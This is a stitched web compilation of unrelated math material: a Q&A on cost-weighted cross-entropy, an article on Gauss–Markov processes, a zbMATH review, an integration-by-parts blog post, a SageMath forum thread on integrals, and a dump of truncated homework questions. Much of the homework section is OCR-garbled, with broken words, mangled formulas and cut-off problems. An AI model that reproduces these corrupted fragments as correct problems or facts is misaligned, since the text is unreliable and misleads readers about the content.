I'm building a binary classifyer that has an unequal payoff given the following cass:
• $Y_{pred}=Y_{actual}= True$: payoff is +x*100
• $Y_{pred}$$\ne$$Y_{actual}= True$: payoff is -x*100
• $Y_{pred}$$\ne$$Y_{actual}= False$: payoff is -1
• $Y_{pred}=Y_{actual}= False$: payoff is +1
In other words, there are two possible courses of action: True for action 1 and False for action 2.
I'm looking at two approaches to implement it:
1. I could mse as loss function with two output neurons, assign the payoffs directly to $Y_{actual}$, with the neural network predicting the payoffs for each of the actions.
• I assume I would then just look for which of the two neurons predicts a higher payoff and use liner function in the last activation layer. Correct?
2. I could create a custom loss function that will calculate the respective payoffs as described above and then use binary cross entropy on that?
Which of those two approaches would be preferred? Should they lead to the same result, giving a recommendation for each sample which action is preferable?
You cannot use your "payoff" function as a loss for your network because it is not differentiable. Instead, you can use a differentiable function which has outputs close to your evaluation metric (payoff).
As you are predicting a binary variable, the way to go is the binomial cross-entropy. The loss function would look like:
$$\mathcal{L}(\mathbf y, \mathbf c, \mathbf t)=-\frac {1}{N}\sum_n 100c_n t_n\log y_n + (1-t_n)\log (1-y_n),$$
where $\mathbf y$ are the predictions, $\mathbf t$ are the targets and $\mathbf c$ are the individual costs for each sample. You can see it is giving the false negative predictions $100c_n$-times higher penalty than false positives.
It is possible that you will have to implement this loss yourself, but it should be quite easy.
Using MSE for classification does not make much sense.
• In my case each sample would need to have an individual weight. Also, cross entropy with weights only seems to offer a coefficient for positive cases - unclear to me what that means as I have basically 4 different payoffs that need to be weighted. – Nickpick Feb 7 '18 at 23:28
• What is "x" in your "payoff"? The weight coefficient for each sample? – Jan Kukacka Feb 8 '18 at 10:40
• Yes that's correct. So I would need the samples weighted but also dependent on the outcome (if correctly matched or not). – Nickpick Feb 8 '18 at 10:43
• Check the updated answer. Hope it solves your problem. – Jan Kukacka Feb 8 '18 at 11:01
• I guess not, but you can use the tensorflow sigmoid_cross_entropy_with_logits source code and modify it for your purpose. – Jan Kukacka Feb 8 '18 at 12:08 |
# Gauss–Markov process
Not to be confused with the Gauss–Markov theorem of mathematical statistics.
Gauss–Markov stochastic processes (named after Carl Friedrich Gauss and Andrey Markov) are stochastic processes that satisfy the requirements for both Gaussian processes and Markov processes.[1][2] The stationary Gauss–Markov process is a very special case because it is unique, except for some trivial exceptions.
Every Gauss–Markov process X(t) possesses the three following properties:
1. If h(t) is a non-zero scalar function of t, then Z(t) = h(t)X(t) is also a Gauss–Markov process
2. If f(t) is a non-decreasing scalar function of t, then Z(t) = X(f(t)) is also a Gauss–Markov process
3. There exists a non-zero scalar function h(t) and a non-decreasing scalar function f(t) such that X(t) = h(t)W(f(t)), where W(t) is the standard Wiener process.
Property (3) means that every Gauss–Markov process can be synthesized from the standard Wiener process (SWP).
## Properties of the Stationary Gauss-Markov Processes
A stationary Gauss–Markov process with variance $\textbf{E}(X^{2}(t)) = \sigma^{2}$ and time constant $\beta^{-1}$ has the following properties.
Exponential autocorrelation:
$\textbf{R}_{x}(\tau) = \sigma^{2}e^{-\beta |\tau|}.\,$
A power spectral density (PSD) function that has the same shape as the Cauchy distribution:
$\textbf{S}_{x}(j\omega) = \frac{2\sigma^{2}\beta}{\omega^{2} + \beta^{2}}.\,$
(Note that the Cauchy distribution and this spectrum differ by scale factors.)
The above yields the following spectral factorization:
$\textbf{S}_{x}(s) = \frac{2\sigma^{2}\beta}{-s^{2} + \beta^{2}} = \frac{\sqrt{2\beta}\,\sigma}{(s + \beta)} \cdot\frac{\sqrt{2\beta}\,\sigma}{(-s + \beta)}.$
which is important in Wiener filtering and other areas.
There are also some trivial exceptions to all of the above.
Ornstein–Uhlenbeck process
## References
1. ^ C. E. Rasmussen & C. K. I. Williams, (2006). Gaussian Processes for Machine Learning. MIT Press. p. Appendix B. ISBN 026218253X.
2. ^ Lamon, Pierre (2008). 3D-Position Tracking and Control for All-Terrain Robots. Springer. pp. 93–95. ISBN 978-3-540-78286-5. |
# zbMATH — the first resource for mathematics
Decidability of definability. (English) Zbl 1327.03008
Let a structure of a finite relational signature be given. The authors study the decidability of the following algorithmic problem: given quantifier-free formulas $$\phi_0,\phi_1,\ldots,\phi_n$$ of its language, whether one can find a primitive positive formula using $$\phi_1,\ldots,\phi_n$$ as basic predicates which is equivalent to $$\phi_0$$ on this structure? A formula is called primitive positive if it is built from the basic predicates by means of conjunctions and existential quantifications only.
The main result of this paper is the proof of the decidability of this problem as well as of some of its variations under some restrictions: the structure must be ordered, homogeneous, Ramsey, and finitely bounded (see the definitions in the reviewed paper). An application of the main result is given as well as example showing that it is impossible to omit some of these restrictions on a structure. Some open problems are formulated.
##### MSC:
03B25 Decidability of theories and sets of sentences 03C40 Interpolation, preservation, definability
Full Text: |
# By Parts Backstory
Here’s the simple concept behind integration by parts as described in an earlier post. Integration by Parts simply what I call the reverse-product rule. Here’s why.
Let $u$ and $v$ be functions of $x$. Using product rule, when we differentiate $uv$, we differentiate the first term *times* keep the second constant *plus* differentiate the second term *times* keep the first constant. That is,
$\displaystyle \frac{d}{dx} \left(uv\right)=\frac{du}{dx} v + u \frac{dv}{dx}$.
Notationally, since $u'=\displaystyle\frac{du}{dx}$ and $v'=\displaystyle\frac{dv}{dx}$, we rewrite the above identity as
$\displaystyle \frac{d}{dx} \left(uv\right)=u'v + uv'$.
Let’s integrate with respect to $x$ on both sides. On the LHS, we are integrating what we get after differentiating. Since they cancel each other out, we get $uv$ on the LHS. On the RHS, we get the integrals of each chunk added together, that is,
$\displaystyle uv = \int u'v\ dx + \int uv'\ dx$.
Subtracting by $\displaystyle \int u'v\ dx$ on both sides and switching the LHS with the RHS, we get
$\displaystyle \int uv' \ dx = uv - \int u'v\ dx$.
which is the famous integration by parts formula.
Hope this was insightful on how this technique is nothing more than reversing the product rule! |
# definite integral returns error but indefinite followed by equivalent subtraction does not
Searching the other questions on definite integrals I did not find the same issue, maybe I missed it. I use SageMath 9.2
When I define these variables:
var('x,y', domain='real')
var('c,p_i', domain='positive')
f_x_pi = 1/5*(3*c - 0.06)*(0.2969*sqrt(x/(c - 0.02)) - 0.126*x/(c - 0.02) - 0.3516*x^2/(c - 0.02)^2 + 0.2843*x^3/(c - 0.02)^3 - 0.1036*x^4/(c - 0.02)^4)
c_i_u = c - 0.02
This:
I = integrate(integrate((x^2+y^2),y,-f_x_pi,f_x_pi),x,0,c_i_u)
return a Maxima requested additional constraints error but this:
I_indef = integrate(integrate((x^2+y^2),y,-f_x_pi,f_x_pi),x)
I = I_indef(x=c_i_u) - I_indef(x=0)
or relying on algorithm='sympy', which is slower, does not.
I am wondering if that's a bug and whether I should report it.
edit retag close merge delete
Sort by » oldest newest most voted
Having floating point constants makes extremely difficult to grasp the structure of the integration bounds. Furthermore, this introduces some absurdities :
sage: bool((c-0.02)==(3*c-0.06))
False
So we replace them :
# Problem data :
var('x,y', domain='real')
var('c,p_i', domain='positive')
f_x_pi = 1/5*(3*c - 0.06)*(0.2969*sqrt(x/(c - 0.02)) - 0.126*x/(c - 0.02) - 0.3516*x^2/(c - 0.02)^2 + 0.2843*x^3/(c - 0.02)^3 - 0.1036*x^4/(c - 0.02)^4)
c_i_u = c - 0.02
# Laziness : find and replace the floating point constants
def GetNums(expr):
if expr.operator() is None:
if expr.is_numeric(): return set([expr])
return set()
return reduce(union, list(map(GetNums, expr.operands())))
L = [u for u in GetNums(f_x_pi) if not u.is_integer()]
# Keep the rationals and 0.02 (see above)
L.remove(1/2)
L.remove(1/5)
D = dict(zip(L, [var("c_{}".format(u)) for u in range(len(L))]))
# Bounds of the inner integration :
D1 = copy(D)
var("c_7")
D1.update({c-0.02:c_7,3*c-0.06:3*c_7})
foo = f_x_pi.subs(D1)
Now, we can compute an exact symbolic form of your expression. The computation of the outer integral by Maxima is indeed hypothesis-dependent :
sage: %time with assuming(c_7>0): Intp = (x^2+y^2).integral(y, -foo, foo).integral(x, 0, c_7).subs({D[u]:QQ(u) for u in D}).subs({c_7:c-1/50}).expand().simplify()
CPU times: user 362 ms, sys: 12 ms, total: 374 ms
Wall time: 269 ms
sage: Intp
379461086555604037/20207687500000000000*c^4 - 379461086555604037/252596093750000000000*c^3 + 1138383259666812111/25259609375000000000000*c^2 - 379461086555604037/631490234375000000000000*c + 379461086555604037/126298046875000000000000000
sage: %time with assuming(c_7<0): Intn = (x^2+y^2).integral(y, -foo, foo).integral(x, 0, c_7).subs({D[u]:QQ(u) for u in D}).subs({c_7:c-1/50}).expand().simplify()
CPU times: user 307 ms, sys: 8.02 ms, total: 315 ms
Wall time: 262 ms
But those expressions are equal :
sage: bool(Intp==Intn())
True
Computation via Sympy is much slower but doesn't need hypotheses :
sage: %time Ints = (x^2+y^2).integral(y, -foo, foo).integral(x, 0, c_7, algorithm="sympy").subs({D[u]:QQ(u) for u in D}).subs({c_7:c-1/50}).expand().simplify()
CPU times: user 12.4 s, sys: 68 ms, total: 12.5 s
Wall time: 12.5 s
and leads to the same value :
sage: bool(Intp==Ints)
This is not a bug : Maxima and Sympy use different algorithms (that's the whole point of having them both in |Sage...). The algorithm used by Maxima depends on huypotheses on the sign of c-0.02, which appears in a square root in the integration bounds...). The expresssions obtained in the two cases happen to be equal.
FWIW : another case can be seen when solving the differential equation a*f(x).diff(x,2)+b*f(x).diff(x)+c*f(x)+d==0 for f(x) : Maxma will request an hypothesis on the sign of b^2-4*a*c, and its answer will be the difference of two exponentials if positive and the sum of two cos functions of x if negative (both multiplied by an exponential function of x)). These answers turn out to be identical up to an application of de Moivre formula, as well as being equal to the (exponentially-expressed, IIRC) answer given by Sympy. Again, that's not a bug, just different ways to reach or express the same result.
HTH,
more |
# There is no img... Que 3 A bandpass signal g(t) of bandwidth B Hz centered at...
###### Question:
there is no img...
Que 3 A bandpass signal g(t) of bandwidth B Hz centered at f 104 Hz is passed through the RC filter in Example 3.16 (Fig. 3.26a) with RC = 10-3. If over the passband, the variation of less than 2% in amplitude response and less than 1 % in time delay is considered to be distortionless transmission, determine what is the maximum allowable value of bandwidth B in order for g(t) to be transmitted through this RC filter without distortion.
#### Similar Solved Questions
##### In the figure below the two blocks are connected by a string of negligible mass passing over a frictionless pulley. m1 = 10.0 kg and m2 = 6.70 kg and the angle of the incline is θ = 39.0°. Assume that the incline is smooth. (Assume the +x direction is down the incline of the plane.)(a)With what acceleration (in m/s2) does the mass m2 move on the incline surface? Indicate the direction with the sign of your answer. m/s2(b)What is the tension in the string in newtons? N(c)For what value of m1
In the figure below the two blocks are connected by a string of negligible mass passing over a frictionless pulley. m1 = 10.0 kg and m2 = 6.70 kg and the angle of the incline is θ = 39.0°. Assume that the incline is smooth. (Assume the +x direction is down the incline of the plane.)(a)With wha...
##### The wave of action potentials will travel in both direction( to left to right ) true...
The wave of action potentials will travel in both direction( to left to right ) true ( why it true )...
##### Por the ideal gas law equation (whichever is Using either the molar volume (STP glmol, of each of the following: appropriate), determine the molar mas that has volume of 2.00L at STP 11.6 g of a gasvolume of 855 mL at 1.20 atm at 18* gas that has0.726and 685 mmHg at 25 %C2.32 g of a gas that has volume of
p or the ideal gas law equation (whichever is Using either the molar volume (STP glmol, of each of the following: appropriate), determine the molar mas that has volume of 2.00L at STP 11.6 g of a gas volume of 855 mL at 1.20 atm at 18* gas that has 0.726 and 685 mmHg at 25 %C 2.32 g of a gas that ha...
##### How do you find the remaining trigonometric ratios if sectheta= -1.5 and pi/2 < theta< pi?
How do you find the remaining trigonometric ratios if sectheta= -1.5 and pi/2 < theta< pi?...
##### John has a 25 gallon fish tank
john has a 25 gallon fish tank. John filled his fish tank today with 24 gallons of water. the water evaporates at a rate of 1.5 gallons per week week. John adds 2 gallons to the tank every other week. At which of the following times will the tank contain 17.5 gallons?a. exactly 11 weeks from todayb....
##### Evaluate tbe fcllowing dciinite integrals (cach worth mazke)1627 7+3 J1-? 22 + *25 + 14ridr cc" (Pr) sin(?r)dr '5 -1 Vr -
Evaluate tbe fcllowing dciinite integrals (cach worth mazke) 1627 7+3 J1-? 22 + * 25 + 14ridr cc" (Pr) sin(?r)dr '5 -1 Vr -...
##### What is the oxidation number of Copper in CuOH+
What is the oxidation number of Copper in CuOH+...
##### If a water electrolysis cell operates at a current of 7.8 $\mathrm{A}$ , how long will it take to generate 25.0 L of hydrogen gas at a pressure of 25.0 atm and a temperature of $25^{\circ} \mathrm{C} ?$
If a water electrolysis cell operates at a current of 7.8 $\mathrm{A}$ , how long will it take to generate 25.0 L of hydrogen gas at a pressure of 25.0 atm and a temperature of $25^{\circ} \mathrm{C} ?$...
##### Problem 4: In a survey, SUNY Broome students were asked how long it took them to commute to school: A total of 35 students responded. The mean commute time was 20.2 minutes with a standard deviation 0f 4.4 minutes. (20 points total)4. What are the sample mean, standard deviation, and sample size? Use correct notation and include appropriate units_b.) Is the sample size large enough so that a t-distribution applies? Explain0: Find the standard error by hand. Round to three decimal places.d.) Find
Problem 4: In a survey, SUNY Broome students were asked how long it took them to commute to school: A total of 35 students responded. The mean commute time was 20.2 minutes with a standard deviation 0f 4.4 minutes. (20 points total) 4. What are the sample mean, standard deviation, and sample size? U...
##### HARMATHAP1Z2.3.012.Mi:I907 -thenuimbcrunlts at whlch maxlmum pront uchicvedprolit functlan for Orm makino uildact; nitsP(x)Find the maxlmum pronit:SubmilAnstcrJ000.
HARMATHAP1Z2.3.012.Mi: I907 - thenuimbcr unlts at whlch maxlmum pront uchicved prolit functlan for Orm makino uildact; nits P(x) Find the maxlmum pronit: SubmilAnstcr J000....
##### Pls give your answer in paragraphs with appropriate examples where necessary. And make sure to give...
Pls give your answer in paragraphs with appropriate examples where necessary. And make sure to give 400 words or more with probably some references. Why is the need for “school health”? What is “coordinated school health program”? And, what are “foundations of school he...
##### Determine algebraically whether each function is even, odd, or neither.$f(x)= rac{1}{x^{4}}$
Determine algebraically whether each function is even, odd, or neither. $f(x)=\frac{1}{x^{4}}$...
##### Use the Product Rule of Logarithms to write the completelyexpanded expression equivalent to ln(9x(2x+5)). Make sure touse parenthesis around your logarithm functions ln(x+y).
Use the Product Rule of Logarithms to write the completely expanded expression equivalent to ln(9x(2x+5)). Make sure to use parenthesis around your logarithm functions ln(x+y)....
##### SM QUESTIONS 1. Identify the stage of disaster management that the city of Saber has reached....
SM QUESTIONS 1. Identify the stage of disaster management that the city of Saber has reached. A. Prevention (or mitigation) B. Preparedness C. Response D. Recovery Chapter 23: Public Health Nursing Practice and the Disaster Management Cycle Student Case Studies The Saber City Disaster Preparedness (...
##### 15. From the information given in the textbook, calculate the standard free energy change at 25.0...
15. From the information given in the textbook, calculate the standard free energy change at 25.0 °C for the reaction between 0.620 mol hydrogen gas and 0.220 mol nitrogen to form ammonia, shown in the following equation: 3H2(g) + N2(8) + 2NH3() A: no; -6.77...
##### Perform the multiplication or division and simplify. $\frac{x^{2}-25}{x^{2}-16} \cdot \frac{x+4}{x+5}$
Perform the multiplication or division and simplify. $\frac{x^{2}-25}{x^{2}-16} \cdot \frac{x+4}{x+5}$...
##### (E) when T→ 0. 14. Express the heat capacity at constant pressure, Cp,and that at onstant...
(E) when T→ 0. 14. Express the heat capacity at constant pressure, Cp,and that at onstant volume. Gr he , Cy, for the case of ideal gas by using enthalpy H, temperature T and the gas constantR of hnumal idoal:oas expansion into vacuum. How about the case...
##### Use moment distribution method or slope deflection method. The frame shown if Fig. 2.1 is supporting...
Use moment distribution method or slope deflection method. The frame shown if Fig. 2.1 is supporting a lateral load of 60 kN and a gravity load of 50 kNIm. Neglect the weight of the members (a) Determine th reaction forces. (b) Draw the axial, shear, and bending moment and qualitative deflecte...
##### 3. If XI, 1n N(,0?). 02 is unknown Let X = Xi_IX; be sample mean, then the standard error of . is &/Vn. Choose:
3. If XI, 1n N(,0?). 02 is unknown Let X = Xi_IX; be sample mean, then the standard error of . is &/Vn. Choose:...
##### Question Completion Status:1012 13 14 15 M1e0 17 18Moving to another question will save this responseQuestion 23Determine whether the pair of lines is parallel, perpendicular, or neither:3x - 2y = -15 2x + 3y = -15 Parallel Perpendicular Neither
Question Completion Status: 10 12 13 14 15 M1e0 17 18 Moving to another question will save this response Question 23 Determine whether the pair of lines is parallel, perpendicular, or neither: 3x - 2y = -15 2x + 3y = -15 Parallel Perpendicular Neither...
##### The Precision Scientific instrument Company manufactures thermometers that are supposed to give readings of Oc at...
The Precision Scientific instrument Company manufactures thermometers that are supposed to give readings of Oc at the freezing point of water. Tests on a large sample of these thermometers reveal that at the freezing point of water, some give readings below 0°C (denoted by negative numbers) and ...
##### Question 6. Show that the three distinct eigenvalues of Az = Az whereA=( are A1 2,42 = 1 and A, = 5_[6 marks]Show that the eigenvector corresponding to A1; 4z. and Az above are 2,0,1), I2 = -4,2) , and Iz (3,0, 2) respectively: Hence. set out the spectral matrix; and the modal matrix, M, for this particular coefficient matrix[10 marks]Use three iterations of the Jacobi method, with the initial approximation (1,1.1). to find the approximate solution _ to the linear system:51 +| T2 2T1 + 312 - +93
Question 6. Show that the three distinct eigenvalues of Az = Az where A= ( are A1 2,42 = 1 and A, = 5_ [6 marks] Show that the eigenvector corresponding to A1; 4z. and Az above are 2,0,1), I2 = -4,2) , and Iz (3,0, 2) respectively: Hence. set out the spectral matrix; and the modal matrix, M, for thi...
##### A chimpanzee named Allison pushes a box. She loads the box full of her toys until...
A chimpanzee named Allison pushes a box. She loads the box full of her toys until it has a mass of 8 kg. The coefficient of kinetic friction between the box and the floor is mu k = 0.4. The box is initially in motion, and moving at a velocity of 1.2 m/s to the right. a) If Allison pushes horizontall...
##### Find the area of the parallelogram with vertices A(-2, 4), B(O, 7), ' C(4, 5) , and D(2, 2).
Find the area of the parallelogram with vertices A(-2, 4), B(O, 7), ' C(4, 5) , and D(2, 2)....
##### Please use R for this problem, provide R codes. Kiplinger's "Best Values in Public Colleges" provides...
please use R for this problem, provide R codes. Kiplinger's "Best Values in Public Colleges" provides a ranking of U.S. public colleges based on a combination of various measures of academics and affordability. The dataset "EX11-18BESTVAL.csv" includes a sample of 25 colleges fro...
##### Refer to Fig. $2.86,$ where $A B$ is a diameter, $T B$ is $a$ tangent line at $B,$ and $\angle A B C=65^{\circ} .$ Determine the indicated angles. $\angle B C T$
Refer to Fig. $2.86,$ where $A B$ is a diameter, $T B$ is $a$ tangent line at $B,$ and $\angle A B C=65^{\circ} .$ Determine the indicated angles. $\angle B C T$...
##### Use limit laws and continuity properties to evaluate the limit. $\lim _{(x, y) \rightarrow(1 / 2, \pi)}\left(x y^{2} \sin x y\right)$
Use limit laws and continuity properties to evaluate the limit. $\lim _{(x, y) \rightarrow(1 / 2, \pi)}\left(x y^{2} \sin x y\right)$...
##### How do you determine the domain and range of a function?
How do you determine the domain and range of a function?...
##### 11. No two electrons can have the same four quantum numbers is known as (the) A....
11. No two electrons can have the same four quantum numbers is known as (the) A. Pauli exclusion principle. B. Hund's rule. C. Aufbau principle. D. Heisenberg uncertainty principle. 12. Give the ground state electron configuration for Sn. A. [Kr]5525d 105p2 B. [Kr]5524d105p2 C. [Kr]5524d105p4 D....
##### (12 pts) Consider the following reaction: Ba3(PO4 2(s) 3Ba* (aq) + 2P0z-(aq_ Ksp = 3.4x10-23 A solution prepared by mixing 75.0 mL of 0.150 M Ba?- with 60.0 mf'of 0.120 MPOZ_ A precipitate forms Calculate the concentration of each ion at equilibrium
(12 pts) Consider the following reaction: Ba3(PO4 2(s) 3Ba* (aq) + 2P0z-(aq_ Ksp = 3.4x10-23 A solution prepared by mixing 75.0 mL of 0.150 M Ba?- with 60.0 mf'of 0.120 MPOZ_ A precipitate forms Calculate the concentration of each ion at equilibrium...
Barlow Company manufactures three products—A, B, and C. The selling price, variable costs, and contribution margin for one unit of each product follow: Product A B C Selling price $180$ 270 $240 Variable expenses: Direct materials 24 80 32 Other va... 1 answer ##### Discusses different areas that currently make up the field of Recreation . Select 1 of the... discusses different areas that currently make up the field of Recreation . Select 1 of the areas that you would be interested in working and address these questions: What type of job you would like to perform, and why? What sort of daily activities would this job require? What credentials would you... 5 answers ##### He the sequence E,U,L,E, R and 7 the string EULER: Let S be the (6 points) Let and T the sct of substrings of n. Detcrminc whether |S| = ITL sct of subsequcnccs of and justify YOUr answer. (Note: 1 is the lowercase Grcek letter cta)Let X = {a,b,6,d,e} and Y = {a,e} and$ the relation on P(X) defined as follows: (A,B) € S if Any = Bny (6 points) Show that S is an equivalence relation:points) Determine the Hmher of distinct equivalence classes
he the sequence E,U,L,E, R and 7 the string EULER: Let S be the (6 points) Let and T the sct of substrings of n. Detcrminc whether |S| = ITL sct of subsequcnccs of and justify YOUr answer. (Note: 1 is the lowercase Grcek letter cta) Let X = {a,b,6,d,e} and Y = {a,e} and \$ the relation on P(X) define...
##### 2 (12 points) The arrival process of customers at a taxi stand is Poisson at rate A, and the arrival process of taxis at the stand is Poisson at rate /'. Arriving customers who find taxis waiting (being delayed) leave immediately in a taxi. Arriving taxis who find customers wait iting leave immediately with one customer each_ Otherwise. customers will queule up to a limit of customers. i.e. arriving customers who find c other customers leave immediately without taxi Similarly, taxis queu
2 (12 points) The arrival process of customers at a taxi stand is Poisson at rate A, and the arrival process of taxis at the stand is Poisson at rate /'. Arriving customers who find taxis waiting (being delayed) leave immediately in a taxi. Arriving taxis who find customers wait iting leave im... |